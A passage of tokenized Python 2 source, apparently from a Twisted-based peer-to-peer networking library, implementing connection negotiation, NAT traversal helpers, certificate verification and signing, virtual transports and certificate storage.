listener , listenCert , desc <EOL> ) in lcget : <EOL> if listener . transport . getPeer ( ) . host == srchost : <EOL> d = listener . callRemote ( <EOL> BindUDP , <EOL> q2qsrc = q2qsrc , <EOL> q2qdst = q2qdst , <EOL> udpsrc = udpsrc , <EOL> udpdst = udpdst , <EOL> protocol = protocol ) <EOL> def swallowKnown ( err ) : <EOL> err . trap ( error . ConnectionDone , error . ConnectionLost ) <EOL> d . addErrback ( swallowKnown ) <EOL> bindery . append ( d ) <EOL> if bindery : <EOL> def _justADict ( ign ) : <EOL> return dict ( ) <EOL> return defer . DeferredList ( bindery ) . addCallback ( _justADict ) <EOL> if ( self . service . getLocalFactories ( q2qdst , q2qsrc , protocol ) <EOL> and srchost == self . _determinePublicIP ( ) ) : <EOL> self . service . dispatcher . seedNAT ( udpdst , srcport , conditional = True ) <EOL> return dict ( ) <EOL> raise ConnectionError ( "<STR_LIT>" ) <EOL> BindUDP . responder ( _bindUDP ) <EOL> def _identify ( self , subject ) : <EOL> """<STR_LIT>""" <EOL> ourPrivateCert = self . service . certificateStorage . getPrivateCertificate ( <EOL> str ( subject ) <EOL> ) <EOL> ourCA = Certificate ( ourPrivateCert . original ) <EOL> return dict ( certificate = ourCA ) <EOL> Identify . responder ( _identify ) <EOL> def verifyCertificateAllowed ( self , <EOL> ourAddress , <EOL> theirAddress ) : <EOL> """<STR_LIT>""" <EOL> if not self . authorized : <EOL> if theirAddress . domain == '<STR_LIT>' : <EOL> return True <EOL> raise VerifyError ( "<STR_LIT>" ) <EOL> peerCert = Certificate . peerFromTransport ( self . transport ) <EOL> ourCert = self . hostCertificate <EOL> ourClaimedDomain = ourAddress . domainAddress ( ) <EOL> theirClaimedDomain = theirAddress . domainAddress ( ) <EOL> if not ourClaimedDomain . claimedAsIssuerOf ( ourCert ) : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( ourClaimedDomain , <EOL> ourCert . getIssuer ( ) ) ) <EOL> if theirClaimedDomain . claimedAsIssuerOf ( peerCert ) : <EOL> if theirAddress . claimedAsSubjectOf ( peerCert ) or theirClaimedDomain . claimedAsSubjectOf ( peerCert ) : <EOL> return <EOL> elif ourClaimedDomain . claimedAsIssuerOf ( peerCert ) : <EOL> return <EOL> elif ourAddress . claimedAsIssuerOf ( peerCert ) : <EOL> return <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( ourCert , peerCert , <EOL> ourAddress , theirAddress ) ) <EOL> def _listen ( self , protocols , From , description ) : <EOL> """<STR_LIT>""" <EOL> self . verifyCertificateAllowed ( From , From ) <EOL> theirCert = Certificate . peerFromTransport ( self . transport ) <EOL> for protocolName in protocols : <EOL> if protocolName . startswith ( '<STR_LIT:.>' ) : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" % <EOL> protocolName ) <EOL> key = ( From , protocolName ) <EOL> value = ( self , theirCert , description ) <EOL> log . msg ( "<STR_LIT>" % key ) <EOL> self . listeningClient . append ( ( key , value ) ) <EOL> self . service . listeningClients . setdefault ( key , [ ] ) . append ( value ) <EOL> return { } <EOL> Listen . responder ( _listen ) <EOL> def _inbound ( self , From , to , protocol , udp_source = None ) : <EOL> """<STR_LIT>""" <EOL> self . verifyCertificateAllowed ( to , From ) <EOL> return self . service . verifyHook ( From , to , protocol <EOL> ) . addCallback ( self . _inboundimpl , <EOL> From , <EOL> to , <EOL> protocol , <EOL> udp_source ) . addErrback ( <EOL> lambda f : f . trap ( KeyError ) and dict ( listeners = [ ] ) ) <EOL> Inbound . responder ( _inbound ) <EOL> def _inboundimpl ( self , ign , From , to , protocol , udp_source ) : <EOL> srvfacts = self . service . getLocalFactories ( From , to , protocol ) <EOL> result = [ ] <EOL> if srvfacts : <EOL> log . msg ( "<STR_LIT>" % ( srvfacts , ) ) <EOL> localMethods = [ ] <EOL> publicIP = self . _determinePublicIP ( ) <EOL> privateIP = self . _determinePrivateIP ( ) <EOL> if self . service . inboundTCPPort is not None : <EOL> tcpPort = self . service . inboundTCPPort . getHost ( ) . port <EOL> localMethods . append ( TCPMethod ( <EOL> '<STR_LIT>' % <EOL> ( publicIP , tcpPort ) ) ) <EOL> if publicIP != privateIP : <EOL> localMethods . append ( TCPMethod ( <EOL> '<STR_LIT>' % <EOL> ( privateIP , tcpPort ) ) ) <EOL> if not self . service . udpEnabled : <EOL> log . msg ( "<STR_LIT>" ) <EOL> elif udp_source is None : <EOL> log . msg ( "<STR_LIT>" ) <EOL> else : <EOL> if self . service . dispatcher is None : <EOL> log . msg ( "<STR_LIT>" % <EOL> udp_source ) <EOL> else : <EOL> remoteUDPHost , remoteUDPPort = udp_source <EOL> log . msg ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( remoteUDPHost , remoteUDPPort , publicIP , privateIP ) ) <EOL> udpPort = self . service . dispatcher . seedNAT ( udp_source , self . service . sharedUDPPortnum ) <EOL> if remoteUDPHost == publicIP and publicIP != privateIP : <EOL> log . msg ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( publicIP , privateIP ) ) <EOL> localMethods . append ( <EOL> PTCPMethod ( "<STR_LIT>" % ( privateIP , udpPort ) ) ) <EOL> localMethods . append ( <EOL> PTCPMethod ( "<STR_LIT>" % ( publicIP , udpPort ) ) ) <EOL> privateUDPPort = self . service . dispatcher . seedNAT ( udp_source ) <EOL> localMethods . append ( <EOL> PTCPMethod ( '<STR_LIT>' % ( publicIP , privateUDPPort ) ) ) <EOL> udpxPort = self . service . dispatcher . seedNAT ( udp_source ) <EOL> localMethods . append ( <EOL> RPTCPMethod ( "<STR_LIT>" % ( publicIP , udpxPort ) ) ) <EOL> if self . service . virtualEnabled : <EOL> localMethods . append ( VirtualMethod ( ) ) <EOL> log . msg ( '<STR_LIT>' % ( localMethods , ) ) <EOL> for serverFactory , description in srvfacts : <EOL> expiryTime , listenID = self . service . mapListener ( <EOL> to , From , protocol , serverFactory ) <EOL> result . append ( dict ( id = listenID , <EOL> expires = expiryTime , <EOL> methods = localMethods , <EOL> description = description ) ) <EOL> key = ( to , protocol ) <EOL> if key in self . service . listeningClients : <EOL> args = dict ( From = From , <EOL> to = to , <EOL> protocol = protocol , <EOL> udp_source = udp_source ) <EOL> DL = [ ] <EOL> lclients = self . service . listeningClients [ key ] <EOL> log . msg ( "<STR_LIT>" % ( to , protocol ) ) <EOL> for listener , listenCert , desc in lclients : <EOL> log . msg ( "<STR_LIT>" % ( to , listener ) ) <EOL> DL . append ( listener . callRemote ( Inbound , ** args ) . addCallback ( <EOL> self . _massageClientInboundResponse , listener , result ) ) <EOL> def allListenerResponses ( x ) : <EOL> log . msg ( "<STR_LIT>" % ( pformat ( result ) , ) ) <EOL> return dict ( listeners = result ) <EOL> return defer . DeferredList ( DL ) . addCallback ( allListenerResponses ) <EOL> else : <EOL> log . msg ( "<STR_LIT>" % ( to , protocol , result ) ) <EOL> return dict ( listeners = result ) <EOL> def _massageClientInboundResponse ( self , inboundResponse , listener , result ) : <EOL> irl = inboundResponse [ '<STR_LIT>' ] <EOL> log . msg ( "<STR_LIT>" % <EOL> ( inboundResponse , listener ) ) <EOL> for listenerInfo in irl : <EOL> listenerInfo [ '<STR_LIT>' ] = [ <EOL> meth for meth in listenerInfo [ '<STR_LIT>' ] if meth . relayable ] <EOL> if listenerInfo [ '<STR_LIT>' ] : <EOL> allowedCertificate = Certificate . peerFromTransport ( <EOL> listener . transport ) <EOL> listenerInfo [ '<STR_LIT>' ] = allowedCertificate <EOL> result . append ( listenerInfo ) <EOL> def _determinePublicIP ( self ) : <EOL> reservePublicIP = None <EOL> if self . service . publicIP is not None : <EOL> if self . service . _publicIPIsReallyPrivate : <EOL> reservePublicIP = self . service . publicIP <EOL> else : <EOL> return self . service . publicIP <EOL> if self . publicIP is not None : <EOL> return self . publicIP <EOL> if reservePublicIP is not None : <EOL> return reservePublicIP <EOL> return self . _determinePrivateIP ( ) <EOL> def _determinePrivateIP ( self ) : <EOL> return self . transport . getHost ( ) . host <EOL> def _sourceIP ( self ) : <EOL> result = { '<STR_LIT>' : self . transport . getPeer ( ) . host } <EOL> return result <EOL> SourceIP . responder ( _sourceIP ) <EOL> def _resume ( self , connection , data , writeDeferred ) : <EOL> try : <EOL> connection . dataReceived ( data ) <EOL> except : <EOL> writeDeferred . errback ( ) <EOL> else : <EOL> writeDeferred . callback ( { } ) <EOL> def _choke ( self , id ) : <EOL> connection = self . connections [ id ] <EOL> connection . choke ( ) <EOL> return { } <EOL> Choke . responder ( _choke ) <EOL> def _unchoke ( self , id ) : <EOL> connection = self . connections [ id ] <EOL> connection . unchoke ( ) <EOL> return { } <EOL> Unchoke . responder ( _unchoke ) <EOL> def amp_WRITE ( self , box ) : <EOL> """<STR_LIT>""" <EOL> id = int ( box [ '<STR_LIT:id>' ] ) <EOL> if id not in self . connections : <EOL> raise error . ConnectionDone ( ) <EOL> connection = self . connections [ id ] <EOL> data = box [ '<STR_LIT:body>' ] <EOL> connection . dataReceived ( data ) <EOL> return AmpBox ( ) <EOL> def amp_CLOSE ( self , box ) : <EOL> """<STR_LIT>""" <EOL> connection = self . connections [ int ( box [ '<STR_LIT:id>' ] ) ] <EOL> connection . connectionLost ( Failure ( CONNECTION_DONE ) ) <EOL> return AmpBox ( ) <EOL> def _sign ( self , certificate_request , password ) : <EOL> """<STR_LIT>""" <EOL> if self . service . portal is None : <EOL> raise BadCertificateRequest ( "<STR_LIT>" ) <EOL> subj = certificate_request . getSubject ( ) <EOL> sk = subj . keys ( ) <EOL> if '<STR_LIT>' not in sk : <EOL> raise BadCertificateRequest ( <EOL> "<STR_LIT>" % ( sk , ) ) <EOL> uandd = subj . commonName . split ( "<STR_LIT:@>" ) <EOL> if len ( uandd ) != <NUM_LIT:2> : <EOL> raise BadCertificateRequest ( "<STR_LIT>" ) <EOL> domain = uandd [ <NUM_LIT:1> ] <EOL> CS = self . service . certificateStorage <EOL> ourCert = CS . getPrivateCertificate ( domain ) <EOL> D = self . service . portal . login ( <EOL> UsernamePassword ( subj . commonName , <EOL> password ) , <EOL> self , <EOL> ivertex . IQ2QUser ) <EOL> def _ ( ial ) : <EOL> ( iface , aspect , logout ) = ial <EOL> ser = CS . genSerial ( domain ) <EOL> return dict ( certificate = aspect . signCertificateRequest ( <EOL> certificate_request , ourCert , ser ) ) <EOL> return D . addCallback ( _ ) <EOL> Sign . responder ( _sign ) <EOL> def _secure ( self , to , From , authorize ) : <EOL> """<STR_LIT>""" <EOL> if self . hostCertificate is not None : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> CS = self . service . certificateStorage <EOL> ourCert = CS . getPrivateCertificate ( str ( to . domainAddress ( ) ) ) <EOL> if authorize : <EOL> D = CS . getSelfSignedCertificate ( str ( From . domainAddress ( ) ) ) <EOL> else : <EOL> self . authorized = False <EOL> return { '<STR_LIT>' : ourCert } <EOL> def hadCert ( peerSigned ) : <EOL> self . authorized = True <EOL> self . _cacheMeNow ( From , to , authorize ) <EOL> return { '<STR_LIT>' : ourCert , <EOL> '<STR_LIT>' : [ peerSigned ] } <EOL> def didNotHaveCert ( err ) : <EOL> err . trap ( KeyError ) <EOL> return self . _retrieveRemoteCertificate ( From , port ) <EOL> D . addErrback ( didNotHaveCert ) <EOL> D . addCallback ( hadCert ) <EOL> return D <EOL> Secure . responder ( _secure ) <EOL> _cachedUnrequested = False <EOL> def _cacheMeNow ( self , From , to , authorize ) : <EOL> tcpeer = self . transport . getPeer ( ) <EOL> self . service . secureConnectionCache . cacheUnrequested ( <EOL> endpoint . TCPEndpoint ( tcpeer . host , port ) , <EOL> ( From , to . domain , authorize ) , self ) <EOL> assert not self . _cachedUnrequested <EOL> self . _cachedUnrequested = ( From , to , authorize , tcpeer ) <EOL> def _uncacheMe ( self ) : <EOL> if self . _cachedUnrequested : <EOL> From , to , authorize , tcpeer = self . _cachedUnrequested <EOL> self . service . secureConnectionCache . connectionLostForKey ( <EOL> ( endpoint . TCPEndpoint ( tcpeer . host , port ) , <EOL> ( From , to . domain , authorize ) ) ) <EOL> def _retrieveRemoteCertificate ( self , From , port = port ) : <EOL> """<STR_LIT>""" <EOL> CS = self . service . certificateStorage <EOL> host = str ( From . domainAddress ( ) ) <EOL> p = AMP ( ) <EOL> p . wrapper = self . wrapper <EOL> f = protocol . ClientCreator ( reactor , lambda : p ) <EOL> connD = f . connectTCP ( host , port ) <EOL> def connected ( proto ) : <EOL> dhost = From . domainAddress ( ) <EOL> iddom = proto . callRemote ( Identify , subject = dhost ) <EOL> def gotCert ( identifyBox ) : <EOL> theirCert = identifyBox [ '<STR_LIT>' ] <EOL> theirIssuer = theirCert . getIssuer ( ) . commonName <EOL> theirName = theirCert . getSubject ( ) . commonName <EOL> if ( theirName != str ( dhost ) ) : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> % ( theirName , dhost ) ) <EOL> if ( theirIssuer != str ( dhost ) ) : <EOL> raise VerifyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( dhost , theirIssuer ) ) <EOL> def storedCert ( ignored ) : <EOL> return theirCert <EOL> return CS . storeSelfSignedCertificate ( <EOL> str ( dhost ) , theirCert ) . addCallback ( storedCert ) <EOL> def nothingify ( x ) : <EOL> proto . transport . loseConnection ( ) <EOL> return x <EOL> return iddom . addCallback ( gotCert ) . addBoth ( nothingify ) <EOL> connD . addCallback ( connected ) <EOL> return connD <EOL> def secure ( self , fromAddress , toAddress , <EOL> fromCertificate , foreignCertificateAuthority = None , <EOL> authorize = True ) : <EOL> """<STR_LIT>""" <EOL> if self . hostCertificate is not None : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> def _cbSecure ( response ) : <EOL> if foreignCertificateAuthority is not None : <EOL> self . authorized = True <EOL> return True <EOL> extra = { '<STR_LIT>' : fromCertificate } <EOL> if foreignCertificateAuthority is not None : <EOL> extra [ '<STR_LIT>' ] = [ foreignCertificateAuthority ] <EOL> return self . callRemote ( <EOL> Secure , <EOL> From = fromAddress , <EOL> to = toAddress , <EOL> authorize = authorize , ** extra ) . addCallback ( _cbSecure ) <EOL> def _virtual ( self , id ) : <EOL> if self . isServer : <EOL> assert id > <NUM_LIT:0> <EOL> else : <EOL> assert id < <NUM_LIT:0> <EOL> tpt = VirtualTransport ( self , id , self . service . _bootstrapFactory , False ) <EOL> return dict ( __transport__ = tpt ) <EOL> Virtual . responder ( _virtual ) <EOL> def attemptConnectionMethods ( self , methods , connectionID , From , to , <EOL> protocolName , protocolFactory ) : <EOL> attemptObjects = [ ] <EOL> for meth in methods : <EOL> atts = meth . attempt ( self , connectionID , From , to , <EOL> protocolName , protocolFactory ) <EOL> attemptObjects . extend ( atts ) <EOL> attemptDeferreds = [ att . startAttempt ( ) for att in attemptObjects ] <EOL> d = defer . DeferredList ( attemptDeferreds , <EOL> fireOnOneCallback = True , <EOL> fireOnOneErrback = False ) <EOL> def dontLogThat ( e ) : <EOL> e . trap ( error . ConnectionLost , error . ConnectionDone ) <EOL> for attDef in attemptDeferreds : <EOL> attDef . addErrback ( dontLogThat ) <EOL> def _unfortunate_defer_hack ( results ) : <EOL> if isinstance ( results , tuple ) : <EOL> stuff = [ ( False , None ) ] * len ( attemptObjects ) <EOL> stuff [ results [ <NUM_LIT:1> ] ] = ( True , results [ <NUM_LIT:0> ] ) <EOL> return stuff <EOL> return results <EOL> def gotResults ( results ) : <EOL> theResult = None <EOL> anyResult = False <EOL> for index , ( success , result ) in enumerate ( results ) : <EOL> if success : <EOL> theResult = result <EOL> anyResult = True <EOL> else : <EOL> attemptObjects [ index ] . cancel ( ) <EOL> if anyResult : <EOL> return theResult . subProtocol <EOL> else : <EOL> reason = Failure ( AttemptsFailed ( [ fobj for ( f , fobj ) in results ] ) ) <EOL> return reason <EOL> d . addCallback ( _unfortunate_defer_hack ) <EOL> d . addCallback ( gotResults ) <EOL> return d <EOL> def listen ( self , fromAddress , protocols , serverDescription ) : <EOL> return self . callRemote ( <EOL> Listen , From = fromAddress , <EOL> protocols = protocols , description = serverDescription ) <EOL> def connect ( self , From , to , <EOL> protocolName , clientFactory , <EOL> chooser ) : <EOL> """<STR_LIT>""" <EOL> publicIP = self . _determinePublicIP ( ) <EOL> A = dict ( From = From , <EOL> to = to , <EOL> protocol = protocolName ) <EOL> if self . service . dispatcher is not None : <EOL> A [ '<STR_LIT>' ] = ( publicIP , <EOL> self . service . sharedUDPPortnum ) <EOL> else : <EOL> log . msg ( "<STR_LIT>" ) <EOL> D = self . callRemote ( Inbound , ** A ) <EOL> def _connected ( answer ) : <EOL> listenersD = defer . maybeDeferred ( chooser , answer [ '<STR_LIT>' ] ) <EOL> def gotListeners ( listeners ) : <EOL> allConnectionAttempts = [ ] <EOL> for listener in listeners : <EOL> d = self . attemptConnectionMethods ( <EOL> listener [ '<STR_LIT>' ] , <EOL> listener [ '<STR_LIT:id>' ] , <EOL> From , to , <EOL> protocolName , clientFactory , <EOL> ) <EOL> allConnectionAttempts . append ( d ) <EOL> return defer . DeferredList ( allConnectionAttempts ) <EOL> listenersD . addCallback ( gotListeners ) <EOL> def finishedAllAttempts ( results ) : <EOL> succeededAny = False <EOL> failures = [ ] <EOL> if not results : <EOL> return Failure ( NoAttemptsMade ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( From , to , protocolName ) ) ) <EOL> for succeeded , result in results : <EOL> if succeeded : <EOL> succeededAny = True <EOL> randomConnection = result <EOL> break <EOL> else : <EOL> failures . append ( result ) <EOL> if not succeededAny : <EOL> return Failure ( AttemptsFailed ( <EOL> [ failure . getBriefTraceback ( ) for failure in failures ] ) ) <EOL> return randomConnection <EOL> return listenersD . addCallback ( finishedAllAttempts ) <EOL> return D . addCallback ( _connected ) <EOL> class SeparateConnectionTransport ( object ) : <EOL> def __init__ ( self , <EOL> service , <EOL> subProtocol , <EOL> q2qhost , <EOL> q2qpeer , <EOL> protocolName , <EOL> connectionEstablishedDeferred = None ) : <EOL> self . service = service <EOL> self . subProtocol = subProtocol <EOL> self . q2qhost = q2qhost <EOL> self . q2qpeer = q2qpeer <EOL> self . protocolName = protocolName <EOL> self . connectionEstablishedDeferred = connectionEstablishedDeferred <EOL> subProtocol = None <EOL> q2qhost = None <EOL> q2qpeer = None <EOL> protocolName = '<STR_LIT>' <EOL> disconnecting = property ( lambda self : self . transport . disconnecting ) <EOL> def getQ2QHost ( self ) : <EOL> return self . q2qhost <EOL> def getQ2QPeer ( self ) : <EOL> return self . q2qpeer <EOL> def makeConnection ( self , tpt ) : <EOL> self . transport = tpt <EOL> self . service . subConnections . append ( self ) <EOL> self . subProtocol . makeConnection ( self ) <EOL> if self . connectionEstablishedDeferred is not None : <EOL> self . connectionEstablishedDeferred . callback ( self ) <EOL> def getPeer ( self ) : <EOL> return Q2QTransportAddress ( self . getQ2QPeer ( ) , <EOL> self . transport . getPeer ( ) , <EOL> self . protocolName ) <EOL> def getHost ( self ) : <EOL> return Q2QTransportAddress ( self . getQ2QHost ( ) , <EOL> self . transport . getHost ( ) , <EOL> self . protocolName ) <EOL> def dataReceived ( self , data ) : <EOL> self . subProtocol . dataReceived ( data ) <EOL> def write ( self , data ) : <EOL> self . transport . write ( data ) <EOL> def writeSequence ( self , data ) : <EOL> self . transport . writeSequence ( data ) <EOL> def registerProducer ( self , producer , streaming ) : <EOL> self . transport . registerProducer ( producer , streaming ) <EOL> def unregisterProducer ( self ) : <EOL> self . transport . unregisterProducer ( ) <EOL> def loseConnection ( self ) : <EOL> self . transport . loseConnection ( ) <EOL> def connectionLost ( self , reason ) : <EOL> self . service . subConnections . remove ( self ) <EOL> if self . subProtocol is not None : <EOL> self . subProtocol . connectionLost ( reason ) <EOL> self . subProtocol = None <EOL> class WhoAmI ( Command ) : <EOL> commandName = '<STR_LIT>' <EOL> response = [ <EOL> ( '<STR_LIT:address>' , HostPort ( ) ) , <EOL> ] <EOL> class RetrieveConnection ( ProtocolSwitchCommand ) : <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ <EOL> ( '<STR_LIT>' , String ( ) ) , <EOL> ] <EOL> fatalErrors = { KeyError : "<STR_LIT>" } <EOL> class Q2QBootstrap ( AMP ) : <EOL> def __init__ ( self , connIdentifier = None , protoFactory = None ) : <EOL> AMP . __init__ ( self ) <EOL> assert connIdentifier is None or isinstance ( connIdentifier , ( str ) ) <EOL> self . connIdentifier = connIdentifier <EOL> self . protoFactory = protoFactory <EOL> def connectionMade ( self ) : <EOL> if self . connIdentifier is not None : <EOL> def swallowKnown ( err ) : <EOL> err . trap ( error . ConnectionDone , KeyError ) <EOL> self . retrieveConnection ( self . connIdentifier , self . protoFactory ) . addErrback ( swallowKnown ) <EOL> def whoami ( self ) : <EOL> """<STR_LIT>""" <EOL> def cbWhoAmI ( result ) : <EOL> return result [ '<STR_LIT:address>' ] <EOL> return self . callRemote ( WhoAmI ) . addCallback ( cbWhoAmI ) <EOL> def _whoami ( self ) : <EOL> peer = self . transport . getPeer ( ) <EOL> return { <EOL> '<STR_LIT:address>' : ( peer . host , peer . port ) , <EOL> } <EOL> WhoAmI . responder ( _whoami ) <EOL> def retrieveConnection ( self , identifier , factory ) : <EOL> return self . callRemote ( RetrieveConnection , factory , identifier = identifier ) <EOL> def _retrieveConnection ( self , identifier ) : <EOL> listenerInfo = self . service . lookupListener ( identifier ) <EOL> if listenerInfo is None : <EOL> raise KeyError ( identifier ) <EOL> else : <EOL> proto = listenerInfo . protocolFactory . buildProtocol ( listenerInfo . From ) <EOL> return SeparateConnectionTransport ( <EOL> self . service , <EOL> proto , <EOL> listenerInfo . to , <EOL> listenerInfo . From , <EOL> listenerInfo . protocolName ) <EOL> RetrieveConnection . responder ( _retrieveConnection ) <EOL> class Q2QBootstrapFactory ( protocol . Factory ) : <EOL> protocol = Q2QBootstrap <EOL> def __init__ ( self , service ) : <EOL> self . service = service <EOL> def buildProtocol ( self , addr ) : <EOL> q2etc = protocol . Factory . buildProtocol ( self , addr ) <EOL> q2etc . service = self . service <EOL> return q2etc <EOL> class VirtualTransport ( subproducer . SubProducer ) : <EOL> implements ( interfaces . IProducer , interfaces . ITransport , interfaces . IConsumer ) <EOL> disconnecting = False <EOL> def __init__ ( self , q2q , connectionID , protocolFactory , isClient ) : <EOL> """<STR_LIT>""" <EOL> subproducer . SubProducer . __init__ ( self , q2q ) <EOL> self . q2q = q2q <EOL> self . id = connectionID <EOL> self . isClient = isClient <EOL> self . q2q . connections [ self . id ] = self <EOL> self . protocolFactory = protocolFactory <EOL> protocol = None <EOL> def startProtocol ( self ) : <EOL> self . protocol = self . protocolFactory . buildProtocol ( self . getPeer ( ) ) <EOL> self . protocol . makeConnection ( self ) <EOL> return self . protocol <EOL> def pauseProducing ( self ) : <EOL> self . q2q . callRemote ( Choke , id = self . id ) <EOL> def resumeProducing ( self ) : <EOL> self . q2q . callRemote ( Unchoke , id = self . id ) <EOL> def writeSequence ( self , iovec ) : <EOL> self . write ( '<STR_LIT>' . join ( iovec ) ) <EOL> def loseConnection ( self ) : <EOL> if self . disconnecting : <EOL> return <EOL> self . disconnecting = True <EOL> d = self . q2q . callRemoteString ( '<STR_LIT>' , id = str ( self . id ) ) <EOL> def cbClosed ( ignored ) : <EOL> self . connectionLost ( Failure ( CONNECTION_DONE ) ) <EOL> def ebClosed ( reason ) : <EOL> if self . id in self . q2q . connections : <EOL> self . connectionLost ( reason ) <EOL> elif not reason . check ( error . ConnectionDone ) : <EOL> log . err ( reason , "<STR_LIT>" % ( self . id , ) ) <EOL> d . addCallbacks ( cbClosed , ebClosed ) <EOL> def connectionLost ( self , reason ) : <EOL> del self . q2q . connections [ self . id ] <EOL> if self . protocol is not None : <EOL> self . protocol . connectionLost ( reason ) <EOL> if self . isClient : <EOL> self . protocolFactory . clientConnectionLost ( None , reason ) <EOL> def dataReceived ( self , data ) : <EOL> try : <EOL> self . protocol . dataReceived ( data ) <EOL> except : <EOL> reason = Failure ( ) <EOL> log . err ( reason ) <EOL> self . connectionLost ( reason ) <EOL> def write ( self , data ) : <EOL> self . q2q . callRemoteString ( <EOL> '<STR_LIT>' , False , body = data , id = str ( self . id ) ) <EOL> def getHost ( self ) : <EOL> return VirtualTransportAddress ( self . q2q . transport . getHost ( ) ) <EOL> def getPeer ( self ) : <EOL> return VirtualTransportAddress ( self . q2q . transport . getPeer ( ) ) <EOL> _counter = <NUM_LIT:0> <EOL> def _nextJuiceLog ( ) : <EOL> global _counter <EOL> try : <EOL> return str ( _counter ) <EOL> finally : <EOL> _counter = _counter + <NUM_LIT:1> <EOL> class DefaultQ2QAvatar : <EOL> implements ( ivertex . IQ2QUser ) <EOL> def __init__ ( self , username , domain ) : <EOL> self . username = username <EOL> self . domain = domain <EOL> def signCertificateRequest ( self , certificateRequest , <EOL> domainCert , suggestedSerial ) : <EOL> keyz = certificateRequest . getSubject ( ) . keys ( ) <EOL> if keyz != [ '<STR_LIT>' ] : <EOL> raise BadCertificateRequest ( <EOL> "<STR_LIT>" + <EOL> repr ( keyz ) ) <EOL> newCert = domainCert . signRequestObject ( <EOL> certificateRequest , <EOL> suggestedSerial ) <EOL> log . msg ( '<STR_LIT>' % ( <EOL> self . username , self . domain , newCert . digest ( ) ) ) <EOL> return newCert <EOL> class DefaultCertificateStore : <EOL> implements ( ICredentialsChecker , IRealm ) <EOL> credentialInterfaces = [ IUsernamePassword ] <EOL> def requestAvatar ( self , avatarId , mind , interface ) : <EOL> assert interface is ivertex . IQ2QUser , ( <EOL> "<STR_LIT>" ) <EOL> return interface , DefaultQ2QAvatar ( * avatarId . split ( "<STR_LIT:@>" ) ) , lambda : None <EOL> def requestAvatarId ( self , credentials ) : <EOL> username , domain = credentials . username . split ( "<STR_LIT:@>" ) <EOL> pw = self . users . get ( ( domain , username ) ) <EOL> if pw is None : <EOL> return defer . fail ( UnauthorizedLogin ( ) ) <EOL> def _ ( passwordIsCorrect ) : <EOL> if passwordIsCorrect : <EOL> return username + '<STR_LIT:@>' + domain <EOL> else : <EOL> raise UnauthorizedLogin ( ) <EOL> return defer . maybeDeferred ( <EOL> credentials . checkPassword , pw ) . addCallback ( _ ) <EOL> def __init__ ( self ) : <EOL> self . remoteStore = { } <EOL> self . localStore = { } <EOL> self . users = { } <EOL> def getSelfSignedCertificate ( self , domainName ) : <EOL> return defer . maybeDeferred ( self . remoteStore . __getitem__ , domainName ) <EOL> def addUser ( self , domain , username , privateSecret ) : <EOL> self . users [ domain , username ] = privateSecret <EOL> def checkUser ( self , domain , username , privateSecret ) : <EOL> if self . users . get ( ( domain , username ) ) != privateSecret : <EOL> return defer . fail ( KeyError ( ) ) <EOL> return defer . succeed ( True ) <EOL> def storeSelfSignedCertificate ( self , domainName , mainCert ) : <EOL> """<STR_LIT>""" <EOL> assert not isinstance ( mainCert , str ) <EOL> return defer . maybeDeferred ( self . remoteStore . __setitem__ , domainName , mainCert ) <EOL> def getPrivateCertificate ( self , domainName ) : <EOL> """<STR_LIT>""" <EOL> return self . localStore [ domainName ] <EOL> def genSerial ( self , name ) : <EOL> return abs ( struct . unpack ( '<STR_LIT>' , md5 ( name ) . digest ( ) [ : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] ) <EOL> def addPrivateCertificate ( self , subjectName , existingCertificate = None ) : <EOL> """<STR_LIT>""" <EOL> if existingCertificate is None : <EOL> assert '<STR_LIT:@>' not in subjectName , "<STR_LIT>" <EOL> mainDN = DistinguishedName ( commonName = subjectName ) <EOL> mainKey = KeyPair . generate ( ) <EOL> mainCertReq = mainKey . certificateRequest ( mainDN ) <EOL> mainCertData = mainKey . signCertificateRequest ( mainDN , mainCertReq , <EOL> lambda dn : True , <EOL> self . genSerial ( subjectName ) ) <EOL> mainCert = mainKey . newCertificate ( mainCertData ) <EOL> else : <EOL> mainCert = existingCertificate <EOL> self . localStore [ subjectName ] = mainCert <EOL> import os <EOL> class _pemmap ( object ) : <EOL> def __init__ ( self , pathname , certclass ) : <EOL> self . pathname = pathname <EOL> try : <EOL> os . makedirs ( pathname ) <EOL> except ( OSError , IOError ) : <EOL> pass <EOL> self . certclass = certclass <EOL> def file ( self , name , mode ) : <EOL> try : <EOL> return file ( os . path . join ( self . pathname , name ) + '<STR_LIT>' , mode ) <EOL> except IOError , ioe : <EOL> raise KeyError ( name , ioe ) <EOL> def __setitem__ ( self , key , cert ) : <EOL> kn = cert . getSubject ( ) . commonName <EOL> assert kn == key <EOL> self . file ( kn , '<STR_LIT:wb>' ) . write ( cert . dumpPEM ( ) ) <EOL> def __getitem__ ( self , cn ) : <EOL> return self . certclass . loadPEM ( self . file ( cn , '<STR_LIT:rb>' ) . read ( ) ) <EOL> def iteritems ( self ) : <EOL> files = os . listdir ( self . pathname ) <EOL> for file in files : <EOL> if file . endswith ( '<STR_LIT>' ) : <EOL> key = file [ : - <NUM_LIT:4> ] <EOL> value = self [ key ] <EOL> yield key , value <EOL> def items ( self ) : <EOL> return list ( self . iteritems ( ) ) <EOL> def iterkeys ( self ) : <EOL> for k , v in self . iteritems ( ) : <EOL> yield k <EOL> def keys ( self ) : <EOL> return list ( self . iterkeys ( ) ) <EOL> def itervalues ( self ) : <EOL> for k , v in self . iteritems ( ) : <EOL> yield v <EOL> def values ( self ) : <EOL> return list ( self . itervalues ( ) ) <EOL> class DirectoryCertificateStore ( DefaultCertificateStore ) : <EOL> def __init__ ( self , filepath ) : <EOL> self . remoteStore = _pemmap ( os . path . join ( filepath , '<STR_LIT>' ) , <EOL> Certificate ) <EOL> self . localStore = _pemmap ( os . path . join ( filepath , '<STR_LIT>' ) , <EOL> PrivateCertificate ) <EOL> class MessageSender ( AMP ) : <EOL> """<STR_LIT:U+0020>""" <EOL> theMessageFactory = protocol . 